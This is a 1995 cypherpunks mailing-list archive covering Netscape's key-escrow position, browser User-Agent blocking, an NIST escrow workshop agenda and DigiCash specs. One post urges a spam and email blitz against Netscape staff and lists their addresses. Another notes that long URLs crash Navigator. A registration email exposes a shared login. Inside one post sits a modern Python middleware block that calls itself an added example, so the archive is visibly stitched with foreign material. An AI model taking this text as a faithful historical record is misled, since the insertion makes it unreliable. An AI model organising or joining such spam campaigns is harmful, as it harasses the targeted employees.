MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 Nov 1995, James A. Donald wrote:

> At 09:43 PM 11/30/95 -0600, Frank Stuart wrote:
> > I'm working on an "obnoxify" program to convert 
> > normal html documents into documents that look 
> > normal to non-netscape browsers, but are too painful to
> > read with netscape (</BLINK>, <FONT SIZE=1>, etc.).  
> > I think tomorrow evening would be a good time to decide 
> > whether or not to distribute it.
> 
> Is there any way one could set up a dirty pictures web
> page in such a fashion that it would be difficult, painful,
> and impractical to get at the pictures through that page
> with a netscape browser?

This is extremely simple to implement.

Make the pages parsed HTML, check the HTTP_USER_AGENT environment 
variable, if it contains Mozilla, return a message that reads something
along the lines of 'hands off my keys', otherwise return useful data 
(GIFs, whatever...)

Also, remember that Netscape Navigator crashes (or at least version 1.x 
did) on URLs that were very long, and also on pages that contained a 
long string of numbers...

Cheers
Graeme

------------------------------------------------------------------------
Graeme Cross                       
                     Phone: (61 +3) 9214 8185  
                    E-mail: graeme@chem2.chem.swin.edu.au
                   PGP key: http://www.chem.swin.edu.au/~graeme/key.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 2 Dec 1995 17:53:41 +0800
To: cypherpunks@toad.com
Subject: John Gage's comments at Computer Security Day in Cleveland
Message-ID: <9512020042.AA27998@all.net>
MIME-Version: 1.0
Content-Type: text


John Gage gave an interesting pitch for Java at the CSSI Computer
Security Day sessions in Cleveland yesterday (November 30).  Among
his comments were:

	Java is not secure - it is "safe"

	He (John Gage) regularly downloads binary executables from the
	Internet and runs them on his workstation at Sun - (connected to
	the internal Sun network).

	Sun has terrible physical security - unknown people roam the halls
	at night all by themselves.

	In 2 years, you will be able to buy a computer that does more than
	a Sparc now does, in a portable package the size of a cell
	phone, with more than 30 million bits per second of mobile
	bandwidth direct to the Internet, for less than $30.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 2 Dec 1995 09:44:33 +0800
To: cypherpunks@toad.com
Subject: Re: Aware's radiation detector
Message-ID: <v02120d12ace54537e56f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>> This month's Scientific American has an ad by Aware for that serial port
>> radiation detector we were discussing a while back. Upper right corner
>> of page 109, I think. Sells for $149 US, 45 day money back guaranty.
>
>This wouldn't be the wavelet company in Cambridge, MA, would it?

This reminds me at mobile world this week, some of the wearables guys at
Steve Roberts' BEHEMOTH booth showed me a $20 alpha and beta detector half
the size of a matchbook. Said something about it being Russian surplus...

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sat, 2 Dec 1995 09:56:25 +0800
To: cypherpunks@toad.com
Subject: Windows95 "Security"
Message-ID: <Pine.LNX.3.91.951201201911.32274A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


Where is the password data file kept?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Sat, 2 Dec 1995 14:55:14 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Fun quote
Message-ID: <m0tLhnG-0004vjC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain



Just heard on tonight's "X-Files"...

"The NSA?? Since when did they start issuing you guys
piano wire instead of guns??"

I can hear the clatter of .sig files being updated all
over the net.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 2 Dec 1995 10:20:23 +0800
To: cypherpunks@toad.com
Subject: Re: Cyberspace Inc & Robber Baron Age
Message-ID: <v02120d34ace55b5b1912@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


> Instead of an infrastructure for public communications -- like
> the current Internet, or the American highway system -- cyber-
> space would be developed as a corporate owned monopoly --
> priced at whatever the traffic will bear.

More technophobic hogwash from an industrial-centralist mind.

Anyone who looks at the possibility of semi-autonomous, hell, autonomous,
software out there buying and selling things "out of control" of the people
who use it, much less those who wrote it, in an emergent-structure chaotic
microtransaction market, on a network where the price of semiconductor
switching falls exponentially, making everything, code, hardware,
link-length, everything, smaller and smaller and faster and faster, (inhale)
can't possibly say stuff like that.

These folks are looking backwards so far they're going to trip over the future.

Feh.

;-)

Cheers,
Bob Hettinga
<roasted tail-feathers and all...>


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 1995 13:05:12 +0800
To: Michael Froomkin <cypherpunks@toad.com>
Subject: Re: FW: websurfer 4.6 (fwd)
Message-ID: <199512030450.UAA06088@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:56 AM 12/2/95 -0500, Michael Froomkin wrote:
>so much for compatibility....guess I'm sticking with netscape for now.


Websurfer is intolerably buggy.

The latest Mosaic seems pretty good to me.


>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lindat@iquest.net (Linda Thompson, American Justice Federation)
Date: Sat, 2 Dec 1995 11:03:18 +0800
To: news@aen.org
Subject: C'MON N' GIVE 'EM HELL, NET-NERDS!!!!
Message-ID: <m0tLhQS-00033cC@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


They asked for it:

"To secure Net communications, the government will need to
have access to private data exchanges using what is known as a key escrow
security system," -Netscape Communications chairman Jim Clark, arguing for
a security system called key escrow that would require you to give the
government access to your private messages.

Source: STAMPER'S NEWS NUGGETS 

(1)  SPAM THE SIGN
 Netscape has a webpage at www.netscape.com.  There is a "toys" area and any
message you leave in that area goes to an ELECTRONIC MARQUEE SIGN at
Netscape that all the employees can see.  SPAM THAT SIGN.

(2) SPAM NETSCAPE

Here's where the EMAIL BLITZ should go (extra points for creativity):

info@netscape.com 
     General information 

admgr@netscape.com 
     Netscape site advertising sales 

x_cbug@netscape.com 
     Bug reports from X Window users 

win_cbug@netscape.com 
     Bug reports from Windows users 

mac_cbug@netscape.com 
     Bug reports from Macintosh users 

hr@netscape.com 
     Netscape Human Resources department 

training@netscape.com 
     Netscape Training programs information 

admgr@netscape.com 
     Netscape site advertising sales and Sponsor program information 

proprietor@netscape.com 
     Netscape electronic store feedback 

editor@netscape.com 
     Feedback about Netscape's Net site 

ssl-talk-request@netscape.com 
     E-mail list for Secure Sockets Layer protocol discussion 

standards@netscape.com 
     Questions about Netscape's open-standards activities 

nswinapi-talk-request@netscape.com 
     E-mail list for users of the Windows Netscape Server API 
CORPORATE HEADQUARTERS 

-------------------------------------------------------------

NETSCAPE COMMUNICATIONS CORPORATION 
     501 E. Middlefield Rd.
     Mountain View, CA 94043
     415/528-2555 Product and sales information (7:00 a.m. to 5:00 p.m. PST)
     415/254-1900 Executive offices
     415/528-4124 Fax
     http://www.netscape.com 

ATLANTA 
     Netscape Communications Corporation
     1850 Parkway Pl.
     Suite 420
     Marietta, GA 30067

CHICAGO 
     Netscape Communications Corporation
     2159 N. Seminary
     Chicago, IL 60614

DALLAS 
     Netscape Communications Corporation
     17304 North Preston Road
     Suite 800
     Dallas, Texas 75252

NEW YORK 
     Netscape Communications Corporation
     599 Lexington Ave.
     Suite 2300
     New York, NY 10022

NORTHWEST 
     Netscape Communications Corporation
     501 Middlefield Rd.
     Mountain View, CA 94043

SOUTHWEST 
     Netscape Communications Corporation
     111 N. Sepulveda Blvd.
     Manhattan Beach, CA 90266

WASHINGTON, D.C. 
     Netscape Communications Corporation
     6701 Democracy Blvd.
     Suite 300
     Bethesda, MD 20817

THANKS AND A HAT TIP TO HELEN AT E.PLURIBUS  FOR GETTING ALL THE
ADDRESSES!!!!!!!!
Kind regards,

***********************  V  *************************
          DEATH TO THE NEW WORLD ORDER
****************************************************

Linda Thompson
American Justice Federation
Home of AEN News & news videos, "Waco, the Big Lie,"  "America Under Siege"
3850 S. Emerson Ave.
Indianapolis, IN 46203
Telephone:  (317) 780-5200
Fax:  (317) 780-5209
Internet:  lindat@iquest.net

**************************************************
   Remember Waco.  The Murderers are still free.
***************************************************

The Army is going to courtmartial Spc. Michael New 
for not wearing a U.N. uniform, but the Army won't
courtmartial the members of the 160th and 158th
Special Operations, 82nd Airborne, Ft. Hood Cav
Members, and 10th Mountain Division members 
who helped MURDER CHILDREN at Waco.

What's wrong with this picture?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 2 Dec 1995 14:55:33 +0800
To: cypherpunks@toad.com
Subject: Re: A "Warning Banner" for Netscape Navigator? Good idea!
Message-ID: <v02120d3eace5624bba5c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


It's been a long and interesting day...

>Pull down the 'Options' menu, grab the 'Window and Link styles'
>page, and change the default "home page location" from
>netscape's to whatever you want.

Oh. *Those* advertisements! I couldn't for the life of me figure out *what*
Tim was talking about. I've made mine come up blank since the initial,
"Hey, what do these twiddly bits in the Preferences command do...", session
after the first download. You can also put up a type-it-yourself URL window
on the browser window, which comes in handy now that you have to wait 10
seconds (on my dinky PB 180) every time you change code modules in 2.0b3
Netscape (like touching<!> the menu bar for the first time, or looking at
the bookmark window)... Like I've said elsewhere, Netscape is hierarchical
code trying to conquer a geodesic (a word I got from Bucky Fuller, through
Peter Huber, just so I keep my attributions straight...) network. It ain't
gonna fly, in the long run, folks.

In that vein, could someone e-mail me the best non-netscape Mac browser, so
I don't get HTML-nasties when I go play on the cactus machine?

Anyway...

Dave Winer(sp?), the Mac-Developer-turned-gadfly (speak not ill of the
other gadflies, I always say...), talks about seeing some Netscape
(sorry...) patches which actually *do* strip banner ads from various
web-pages. I believe you have to tell it which pages, and what the banners'
file names are, but I'm not sure. Don't know where *Weiner(sp?)* got it
from... I seem to remember the name "Ad Stripper" but I could be imagining
things...

Of course, if that's the way this code really operates, simply changing the
name of the HREF call regularly on the server side, which is probably done
anyway, with all the web-management code showing up out there, defeats
ad-filters of this kind completely...

Obcrypto: Maybe these web-pages will send you nanocash (not mine, either,
sorry, taken from one of the wearable-people at mobileworld, I'll look up
their name, and get back to you. soon. I promise.) to watch their message?

Also, could someone talk here about how easy it might be to spoof Java
"byte code"? The Java presentation at this conference had a lot of
hand-waving and reverent invocation of Whit Diffie's name, so it might not
be trivial. Another feature of this presentation was a really splendid
"subjective axis" chart showing how "powerful" Java is in comparison to
say, client-server, HTML, and other "technologies". This chart reminded me
for all the world of the famous "Pravda Charts" that Tufte likes to lampoon
in "The Graphical Representation of Quantitative Information". Just so I
keep my sources straight. Of course.

To quote Prof. Tufte. "If it looks like a duck, ignore it." Or something to
that effect. Maybe the word "waddle" was in the sentence. Maybe he got it
from someone else... I'll get back to you on that. I really will...

;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FutureNet Server <nobody@futurenet.co.uk>
Date: Sun, 3 Dec 1995 01:41:43 +0800
To: cypherpunks@toad.com
Subject: FutureNet Registration
Message-ID: <9512012209.AA22388@webserv.futurenet.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Congratulations, you have just successfully registered for FutureNet,
Europe's most popular e-zine.

Your registration details are:

  Username: cypherpunks
  Password: cypherpunk

You should bookmark a page within FutureNet so that you can revisit
the site without having to type in your username and password again.
The URL for the FutureNet homepage is:

  http://www.futurenet.co.uk/,cypherpunks,cypherpunk,/menu.html

Keep this message somewhere safe, it contains your FutureNet reader
identification details.  If you have any problems accessing FutureNet,
send mail to webmaster@futurenet.co.uk.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 1995 05:57:13 +0800
To: cypherpunks@toad.com
Subject: Re: A "Warning Banner" for Netscape Navigator? Good idea!
Message-ID: <ace520b5130210044dd8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:39 AM 12/2/95, Robert Hettinga wrote:
>It's been a long and interesting day...
>
>>Pull down the 'Options' menu, grab the 'Window and Link styles'
>>page, and change the default "home page location" from
>>netscape's to whatever you want.
>
>Oh. *Those* advertisements! I couldn't for the life of me figure out *what*
>Tim was talking about. I've made mine come up blank since the initial,
>"Hey, what do these twiddly bits in the Preferences command do...", session

Indeed, I figured this out a long time ago, too. As I said in a recent
post, I don't have Netscape's page come up when I start Netscape.

The ads I'm talking about are the ads introduced when various Net tools are
used, such as Infoseek, Deja News, Excite, Yahoo, etc.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 1995 01:41:14 +0800
To: cypherpunks@toad.com
Subject: Info on Netscape's key escrow position
Message-ID: <199512020701.XAA01919@ammodump.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



  I had lunch with Jim Clark today, and explained the furor that was
currently going on in cypherpunks and elsewhere.  After lunch he sent
me the e-mail that I've attached below to pass along.  I think the gist
of it is that if governments require key escrow, we will have to do it
in order to sell our products with encryption into those countries.

  We've actively lobbied against the government's proposal through
our participation and support of industry efforts by the ITAA, BSA,
SPA and others.  Next week we will be sending two representatives
to the NIST key escrow conference in DC.  In preparation for that
meeting we have been formulating an official company position on
key escrow and export restrictions.  Phil, myself, and other folks with
cypherpunk leanings are involved in writing the policy statement.
We are planning on taking a firm position against the government's
key escrow proposals.  Some time next week we will be posting our
statement publicly, and will welcome your comments on it then.

  After the NIST meeting we will also be talking to folks in congress
and the white house about our position, looking for help in getting the
current export limitations removed.  We will also be looking for
help in getting the government's position on export controlled FTP
sites clarified so that we can make the US version of the Navigator
with 128-bit crypto available for download by those people who are
legally allowed to use it.

  We don't have any plans to stop doing separate US and export
versions of our software.  As long as our customers want strong
crypto and the government lets us sell it, I think we will keep
doing it.

	--Jeff

Jim Clark wrote:
> 
> I made some pragmatic comments.
> 
> I said that if we are to use this encryption technology in business, we must
> have a better solution than to limit keylength or put keys in escrow. All
> governments of the world have a valid concern about terrorism and other
> activities of concern to the security of their nations. All of them will
> continue to restrict our ability to provide products to their markets unless
> we build in some mechanism that allows them to legally access
> information that is in the interest of their national security. (We obviously
> cannot be involved in determining what is legal by the laws of that country.)
> This is not just a US government problem. Until recently, France did not even
> allow us to sell products with 40-bit keys, much less 128-bit keys.
> 
> A lot of ordinary citizens are rightly concerned about their own privacy. I
> am one of them. I do not want the government to snoop on me, but in fact the
> government, through the FBI, can now tap my phone without my knowing it by
> simply getting sufficient evidence that I am conducting illegal activities,
> then presenting this evidence to a court to get permission. I have no say in
> the matter.
> 
> If we as a company were to take the position that in no case will we allow
> a government to get access to our encrypted messages, or refuse to allow
> key escrow with our products, the governments of the world will quickly put
> us out of business by outlawing the sale of our products in their countries.
> The fundamental issue is how do we accommodate the requirements of governments,
> while protecting our rights as citizens.
> 
> None of this represents the position of Netscape with respect to what we
> will do. But if we do not come up with a solution to this problem that is
> acceptable to each government, we will not be able to export our products,
> except with a short key length (e.g. 40 bit keys), and that will not be
> acceptable to corporate customers in other countries. They will create their
> own solution, and we will not be able to sell to a larger world market. In
> fact, we could even be ordered by our own government to establish a key
> escrow system for its use inside the US.
> 
> Ironically, anyone in the US may import unbreakable encryption technology from
> another country -- we just cannot sell it back to them. No one ever accused the
> government of being rational.
> 
> I chair an industry group called the "Global Internet Project", with members
> from almost twenty companies, including companies from Asia and Europe. This
> was the central issue we all agreed upon this morning, and we are putting
> together a policy statement whose purpose is to educate lawmakers on the
> importance of quick resolution of this matter.
> 
> Thanks for your concern. Let me know what you like and don't like.
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sat, 2 Dec 1995 12:43:36 +0800
To: cypherpunks@toad.com
Subject: Netscape, Mosaic, and other goodies.
Message-ID: <Pine.LNX.3.91.951201231649.5324C-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> > > The field is User-Agent. However, blocking access to users of Navigator 
> > > isn't a particularly useful thing to do. If you must do something, why 
> > > not modify your GET handler to add a header to the start of all html 
> > > pages informing people of the problem, and suggesting alternatives. 
> > 
> > Great idea! I'm sure there is a cypherpunk on this list willing to write a 
> > patch to NCSA HTTPd to get the job done, in a configurable manner of 
> > course so that a template.html would be 'inserted' at the top of every 
> > document sent out to the specified browser. Any takers?
> 
> No need. Simply add
> 
> <meta http-equiv="Refresh" content="1;URL=netscape-warning.html">
> 
> to the start of your page. Netscape browsers will be redirected.

Are you sure Netscape browsers are the only ones that currently implement 
this tag? Other browsers will be implementing it soon enough I'm 
sure. I think the only fool-proof way of doing it is at the webserver.

Anyway, isn't 5 million bux a little too much for the government to give 
Netscape for the security improvements? I would think that for less than a 
million a group of programmers could be rounded up to create a stable 
multi-platform web navigator with VRML, MPEG, Audio, Postscript, and a 
zillion other features built in. :)

It's funny how one day we are raving about how great Netscape is, and the 
next day we hate them. If we aren't pleased with a particular piece of 
software, instead of arguing about it we should just go and make one 
that we are pleased with. Using the many libraries available such as MPEG, 
GIF, JPEG for example and releasing it under the GNU agreement is the way 
to go. Or perhaps we should just back the original browser, NCSA Mosaic. 
With some improvements it could once again be the best browser on the net.

I suppose I'm not clear about the implications of these escrow keys... 
just because the government is supporting it, and Netscape will be 
implementing it doesn't mean that we have to use it. Is it against the 
law to encrypt data (using your own method) and send it over the Internet?
I don't think so.

...
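
The server-side approach discussed in this message, as an added example that is not part of the original post or of NCSA HTTPd: a Python WSGI middleware, standing in for the proposed HTTPd patch, that inserts a configurable notice at the top of HTML documents sent to a chosen User-Agent pattern. The class name, pattern, notice text and sample User-Agent strings are constructed assumptions; because User-Agent is supplied by the client, the match is advisory and is not an access control.

```python
import re

# Matches the opening <body ...> tag so the notice lands inside the document.
BODY_TAG = re.compile(rb"<body\b[^>]*>", re.IGNORECASE)


class UserAgentBanner:
    """WSGI middleware: put `banner_html` at the top of HTML responses
    sent to clients whose User-Agent header matches `ua_pattern`."""

    def __init__(self, app, ua_pattern, banner_html):
        self.app = app
        self.ua_re = re.compile(ua_pattern)
        self.banner = banner_html.encode("utf-8")

    def __call__(self, environ, start_response):
        seen, chunks = {}, []

        def capture(status, headers, exc_info=None):
            seen["status"], seen["headers"] = status, list(headers)
            return chunks.append          # supports the legacy write() callable

        result = self.app(environ, capture)
        try:
            chunks.extend(result)         # buffer the wrapped app's whole body
        finally:
            if hasattr(result, "close"):
                result.close()
        body = b"".join(chunks)

        headers = seen["headers"]
        ctype = next((v for k, v in headers if k.lower() == "content-type"), "")
        ua = environ.get("HTTP_USER_AGENT", "")   # client-supplied, spoofable
        if (self.ua_re.search(ua)
                and seen["status"].startswith("200")
                and ctype.lower().startswith("text/html")):
            body = self._insert(body)
            # The body grew, so the old Content-Length is no longer valid.
            headers = [(k, v) for k, v in headers
                       if k.lower() != "content-length"]
            headers.append(("Content-Length", str(len(body))))
        # Tell caches the response differs per browser, so a proxy does not
        # hand the notice-bearing copy to other clients (or the reverse).
        headers.append(("Vary", "User-Agent"))
        start_response(seen["status"], headers)
        return [body]

    def _insert(self, body):
        m = BODY_TAG.search(body)
        if m:                              # right after <body ...>
            return body[:m.end()] + self.banner + body[m.end():]
        return self.banner + body          # no <body> tag: prepend


# Constructed page standing in for any document the server sends out.
PAGE = b"<html><body bgcolor=white><h1>Index</h1></body></html>"
# Constructed notice; the link target is the file name used in the thread.
NOTICE = '<p><a href="netscape-warning.html">Notice for this browser</a></p>'


def demo_app(environ, start_response):
    start_response("200 OK", [("Content-Type", "text/html"),
                              ("Content-Length", str(len(PAGE)))])
    return [PAGE]


def fetch(app, user_agent):
    """Drive a WSGI app in-process; returns (status, headers, body)."""
    out = {}

    def sr(status, headers, exc_info=None):
        out["status"], out["headers"] = status, headers
        return lambda chunk: None

    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": "/",
               "HTTP_USER_AGENT": user_agent}
    body = b"".join(app(environ, sr))
    return out["status"], out["headers"], body


if __name__ == "__main__":
    app = UserAgentBanner(demo_app, r"^Mozilla/", NOTICE)
    # Constructed User-Agent strings in the style of 1995 browsers.
    for ua in ("Mozilla/2.0b3 (X11; I; Linux 1.2.13 i586)",
               "NCSA Mosaic/2.6 (X11; Linux 1.2.13 i586)"):
        status, headers, body = fetch(app, ua)
        print(ua, "->", status, len(body), "bytes")
```

Unlike the meta Refresh tag, this does not depend on which browsers implement a given tag, but a client that sends a different User-Agent string simply receives the page without the notice.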





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 1995 15:53:30 +0800
To: cypherpunks@toad.com
Subject: Re: nsa and netscape
In-Reply-To: <951201073154.60201e3d@mitlns.mit.edu>
Message-ID: <30C000A3.E0E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Bob Bruen, MIT Lab for Nuclear Science wrote:
> 
>   The following came from a government source. I thought it might be of
>   interest.
>                        Bob
> --------------------------------------------------------------------------
> 
>      At yesterday's FNC  (Federal Networking Council) meeting it was
>      mentioned in passing that NSA has given Netscape a grant of $5 Million
>      (yes $5M) to beef up the security features of Netscape. More info will
>      be forthcoming on this.

  This is not strictly true.  The NSA has given us a contract to add
support for Fortezza to some of our products, including servers and
navigators.  The amount was less than $5M, but I'm not sure that I
should say how much it was.

  One of the things we hope to get out of this work is an architecture
for our products that allows us to easily support other crypto hardware,
including devices that don't use Secret algorithms, and don't require
key-escrow.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 1995 17:50:08 +0800
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <199512011556.HAA08776@blob.best.net>
Message-ID: <30C006E4.D39@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> At 03:01 AM 12/1/95 -0800, Timothy C. May wrote:
> >I hope the media types reading now will attend the December 5th (I
> >think...details should be available) gathering on "key escrow" in
> >Washington. D.C. This should be a fiery meeting, especially if the Netscape
> >reps (I assume someone from Netscape will be attending, given their central
> >role in the all-important Web world) either denounce GAK or support GAK.
> 
> I will prepare the netscape dehanced dirty pictures web page,
> but not advertize the URL until shortly after December 5th.
> 
> I hope to hear a suitable "clarification" before then.

  See my recent message to this list.  We will be taking an anti-GAK
position.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 2 Dec 1995 09:10:26 +0800
To: cypherpunks@toad.com
Subject: Draft agenda for 12/5 Key Escrow Workshop
Message-ID: <199512012315.AAA14620@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



To:  Key Escrow Distribution List

From:  Ed Roback, NIST

Subject:  Tent. Agenda for 12/5 Meeting

Following for your information is the tentative agenda for the  
meeting next Tuesday.

Attachment

---------------------

D R A F T

Proposed 64-bit Software Key Escrow
Encryption Export Criteria Meeting

Red Auditorium
National Institute of Standards and Technology

December 5, 1995


9:00        Welcome
              Ed Roback, NIST


9:10        Perspectives, Objectives of Criteria, and Future Plans
              Michael Nelson, Co-Chairman
              Interagency Working Group on
                     Encryption and Telecommunications (IWG/ET)


9:30        Exportability Criteria Discussion
              Clint Brooks
              National Security Agency


10:45         Break


11:00      Draft Key Escrow Agent Characteristics
              Geoff Greiveldinger
              U.S. Department of Justice


12:00      Lunch (on your own, NIST cafeteria available)


1:00       Industry Perspectives

              Bill Sweet & Ken Mendelson, TIS
              Dorothy Denning, Georgetown University
              Melanie Janin, U.S. Council for International Business
              Ed Scheidt, Tecsec
              Jerry Berman & Daniel Weitzner,
                     Center for Democracy and Technology
              Paul Lambert, Oracle
              David Sobol, Electronic Privacy Information Center
              Padgett Petersen, Lockheed-Martin
              Robert Holleyman, Business Software Alliance
              Alex McIntosh, PC Security Limited (UK)
              Doug Miller, Software Publishers Association
              (time permitting:)
              Randy Sabett, Spyrus
              Shabir Safdar, Voters Telecommunications Watch
              Viktor Hampel, Hampel Consulting


2:30       Break


2:45       Cont. (as necessary)


3:45       Wrapup & Adjourn
              Ed Appel, Co-Chairman, IWG/ET


*****************************************************  

Elaine Frye
Computer Security Division
National Institute of Standards and Technology  
Bldg. 820, M.S. Room 426
Gaithersburg, MD  20899-0001
Voice:   301/975-2819    Fax:  301/948-1233

*****************************************************


[Note that the planned breakout sessions originally appear
to have been axed, and the meet has dwindled to a vent for 
industry reps who've already publicized their positions. 
Now watch brute key escrow spread covertly for "public 
security."]








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sat, 2 Dec 1995 13:47:10 +0800
To: cypherpunks@toad.com
Subject: No Privacy Right in UK ? - Part 3
Message-ID: <Pine.BSD.3.91.951202002414.10211B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
             
Friend, 
 
 
A 12 01 95 The Electronic Telegraph newsstory headlined 
 
         Policeman bugs own station by mistake 
 
reports: 
 
   ...a listening device was found at the headquarters of 
   Lothian and Borders Police in Edinburgh. 
 
   The "bug", disguised to look like a plug adaptor, picked up 
   the day-to-day business of the operations room, including 
   radio and telephone messages and conservations between 
   staff. 
 
Conservations between staff?  Conversations in which not a 
word is wasted? 
 
   Its presence was discovered when staff in a rest area tried 
   to tune a radio to a different station and picked up the voices 
   of their colleagues. 
 
I used to despise those who couldn't keep their hands off the 
dial for 5 minutes, but since reading this story my attitude's 
been adjusted. 
 
   Concerned that secrets were being transmitted abroad, the 
   force "swept" the control room with anti-bugging technology, 
   only to find that the device belonged to them. 
 
   It had been "planted" by an officer who thought it was a real 
   adaptor. 
 
 
Of course I believe that! 
 
For what comes around...goes around. 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The Electronic Telegraph website's URL: 
 
       http://www.telegraph.co.uk 
 
       The newsstory's by: 
 
       AUSLAN CRAMB, SCOTTISH CORRESPONDENT 
 
       Its online filename: 1bugs01.html 
 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 2 Dec 1995 13:55:31 +0800
To: support@marktwain.com
Subject: Re: DigiCash releases protocol specs!
Message-ID: <01HYB9JVY8VG8WZ1OE@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"support@marktwain.com"  1-DEC-1995 18:56:11.57

By popular request, DigiCash is releasing the protocol specs.

The specs are available at 
http://www.digicash.com/ecash/protocol.html

Please be aware that the document is work in progress. More 
specifications, including byte level descriptions of the message 
format will be added throughout the weekend.

--Lucky Green at
----------------------
	Thank you. This raises my likelihood of using DigiCash's electronic
currency from about none to above that.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 13:57:24 +0800
To: unicorn@polaris.mindport.net (Black Unicorn)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.SUN.3.91.951202031812.18919B-100000@polaris.mindport.net>
Message-ID: <199512020833.AAA09396@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> So, for a 15% reduction in salary and 30 days of job search, is it worth it?

	30 days? in silicon valley? you *must* be joking. (i suppose
the market for good net-folks isn't as big over on the right coast.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
